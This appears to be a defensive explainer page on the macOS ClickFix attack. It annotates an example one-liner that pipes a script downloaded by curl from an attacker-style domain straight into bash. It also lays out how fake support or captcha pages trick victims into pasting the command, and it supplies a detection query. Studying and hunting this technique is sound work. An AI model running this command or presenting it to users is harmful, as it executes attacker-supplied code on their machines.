Clickfix curl (Mac)

Download and execute a shell script from a remote URL via curl piped to bash. Same technique as the Windows IEX variant (download from URL, execute). Runs in Terminal.

This command runs on macOS
Example Command breakdown
Hover over highlighted segments to see what each part does.
curl -s https://fix-support.icu/pm | bash
1Silent HTTP fetch

curl fetches the URL. The -s flag runs silently with no progress bar, reducing suspicion.

curl -s 
2Download URL

The URL hosts a shell script. The attacker controls the content. Change the file and the same command delivers a different payload.

https://fix-support.icu/pm
3Pipe

Pipes the downloaded content (stdout) directly into the next command as stdin.

 | 
4Execute

bash reads the piped content and executes it as a shell script.

bash
How it works
The attack chain from victim execution to payload delivery on macOS
  1. 1

    Victim runs the command

    The bash one-liner is presented on a fake support or fix page. The page copies the command to the clipboard, then prompts the victim to open Terminal (Cmd+Space, type Terminal, Enter), paste with Cmd+V, and press Enter.

  2. 2

    HTTP download

    curl -s fetches the content from https://fix-support.icu/pm. The URL hosts a shell script.

  3. 3

    Execute

    The pipe sends the downloaded content to bash, which executes it. The script could launch Calculator, run further downloads, or perform other actions.

Implications
Why this technique is effective and hard to defend against
  • One-liner. A single command is easy to paste and run. Low friction for the victim.
  • Seems legitimate. Victims are used to captchas and security checks. A fake reCAPTCHA-style prompt feels familiar and trustworthy.
  • Full script control. The attacker can host any shell script. Change the file at the URL and the same command delivers a different payload.
  • Attacker-controlled at any time. Update the script on the server. No need to redistribute links or documents.
  • URL in command. The domain is visible in the command. Blocklists and URL filtering can help defenders.
Interactive demo
Experience the clickfix flow: a fake security check prompts you to open Terminal (Cmd+Space), paste (Cmd+V), and press Enter.Note: The command is copied to your clipboard in the background when you click verify, with no prompt and no explicit user interaction. This is how real clickfix attacks work.
Launch demo
Hunting
Detection queries for curl pipe to bash
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine contains "curl"
  and ProcessCommandLine contains "|"
  and ProcessCommandLine contains "bash"
| project Timestamp, DeviceName, AccountName, ProcessCommandLine